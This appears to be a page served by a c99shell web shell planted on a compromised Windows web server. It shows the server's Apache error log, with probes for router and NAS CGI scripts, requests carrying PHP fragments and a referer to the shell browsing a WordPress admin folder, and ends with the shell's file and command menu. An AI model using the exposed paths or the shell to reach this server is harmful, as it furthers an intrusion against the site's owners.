[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:22.913579 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:23.802781 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:25.019583 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:46.610021 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:46.610021 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:46.610021 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:46.610021 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:46.610021 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:46.610021 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:48.731624 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:50.291627 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:57.904440 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:16:59.963644 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:17:00.759245 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:17:01.913647 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:17:59.009748 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:24:14.237207 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:27:18.208330 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:30:32.475471 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:33:52.358622 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:36:35.675309 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:43:08.858400 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:43:08.858400 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:48:43.229387 2024] [core:error] [pid 516:tid 20756] (20024)The given path is misformatted or contained invalid characters: [client 156.59.198.136:42066] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/'%20.%20esc_url(%20$data-%3Eurl%20)%20.%20' HTTP/1.0 to file
[Thu Jun 20 17:49:03.150622 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:55:33.308307 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 17:57:08.655675 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 18:01:45.540561 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 18:04:26.049243 2024] [proxy_http:error] [pid 516:tid 20768] (20014)Internal error: [client 201.245.192.253:60661] AH01102: error reading status line from remote server 172.22.1.16:18080
[Thu Jun 20 18:04:26.049243 2024] [proxy:error] [pid 516:tid 20768] [client 201.245.192.253:60661] AH00898: Error reading from remote server returned by /kwsrmcab/Wsrmcab
[Thu Jun 20 18:07:36.821978 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 18:11:44.051212 2024] [cgi:error] [pid 516:tid 21060] [client 185.191.127.212:52632] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 18:30:37.502403 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 18:32:28.558998 2024] [core:error] [pid 516:tid 20744] (20024)The given path is misformatted or contained invalid characters: [client 47.128.57.57:63780] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/%3C?php%20echo%20%27plugins.php?action=error_scrape&plugin=%27%20.%20esc_attr($plugin)%20.%20%27&_wpnonce=%27%20.%20esc_attr($_GET[%27_error_nonce%27]);%20?%3E HTTP/1.1 to file, referer: http://190.27.245.106/BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=plugins.php&ft=html
[Thu Jun 20 18:38:08.920396 2024] [core:error] [pid 516:tid 21328] (20024)The given path is misformatted or contained invalid characters: [client 47.128.119.247:39686] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/server_privileges.php%27%20%20%20%20%20.%20PMA_URL_getCommon(%20%20%20%20%20array(%20%20%20%20%20%27username%27%20=%3E%20%20%20%20$username,%20%20%20%20%20%27hostname%27%20=%3E%20%20%20%20$hostname,%20%20%20%20%20%27dbname%27%20=%3E%20%20%20%20$url_dbname,%20%20%20%20%20%27tablename%27%20=%3E%20%20%20%20%27%27,%20%20%20%20%20)%20%20%20%20%20)%20%20%20%20%20.%20%27 HTTP/1.1 to file
[Thu Jun 20 18:43:21.030144 2024] [core:error] [pid 516:tid 20832] (20024)The given path is misformatted or contained invalid characters: [client 47.128.53.192:56896] AH00127: Cannot map GET /BLA/resoluciones/AUTOS%202021/server_privileges.php%27%20%20%20%20%20.%20PMA_URL_getCommon(%20%20%20%20%20array(%20%20%20%20%20%27username%27%20=%3E%20%20%20%20$username,%20%20%20%20%20%27hostname%27%20=%3E%20%20%20%20$hostname,%20%20%20%20%20%27initial%27%20=%3E%20%20%20%20$initial,%20%20%20%20%20%27export%27%20=%3E%20%20%20%201,%20%20%20%20%20)%20%20%20%20%20)%20%20%20%20%20.%20%27 HTTP/1.1 to file
[Thu Jun 20 18:56:02.827282 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 18:56:57.130978 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 19:29:46.696837 2024] [cgi:error] [pid 516:tid 20984] [client 45.148.10.174:46708] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 19:29:47.055638 2024] [cgi:error] [pid 516:tid 20744] [client 45.148.10.174:46710] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 19:37:42.653673 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 19:38:04.119311 2024] [cgi:error] [pid 516:tid 21008] [client 185.191.127.212:48966] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 19:39:46.315090 2024] [cgi:error] [pid 516:tid 20744] [client 185.191.127.212:56586] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 19:42:55.029622 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 20:03:08.836554 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 21:13:57.302216 2024] [cgi:error] [pid 516:tid 20816] [client 185.191.127.212:39472] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 21:17:05.438546 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 21:56:55.082943 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 22:06:29.631953 2024] [cgi:error] [pid 516:tid 21288] [client 185.191.127.212:43824] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 22:15:39.392518 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 22:49:23.434673 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 22:55:45.791345 2024] [cgi:error] [pid 516:tid 21416] [client 45.148.10.174:45094] script not found or unable to stat: E:/nuevo/cgi-bin/nas_sharing.cgi
[Thu Jun 20 23:00:41.864265 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 23:17:58.532886 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 20 23:47:03.584151 2024] [cgi:error] [pid 516:tid 21176] [client 185.191.127.212:34956] script not found or unable to stat: E:/nuevo/cgi-bin/luci
[Thu Jun 20 23:54:30.119335 2024] [mpm_winnt:warn] [pid 516:tid 21824] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--